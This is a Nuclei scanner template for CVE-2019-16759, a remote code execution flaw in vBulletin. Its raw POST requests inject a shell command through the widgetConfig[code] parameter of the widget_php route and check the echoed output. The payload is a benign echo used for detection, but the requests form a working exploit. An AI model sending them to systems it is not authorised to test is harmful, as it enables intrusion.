nuclei-templates/cves/CVE-2019-16759.yaml

26 lines
620 B
YAML

id: cve-2019-16759
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4
author: dwisiswant0
severity: high
requests:
- raw:
- |
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
- |
POST / HTTP/1.1
{"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "nonexistent:1337"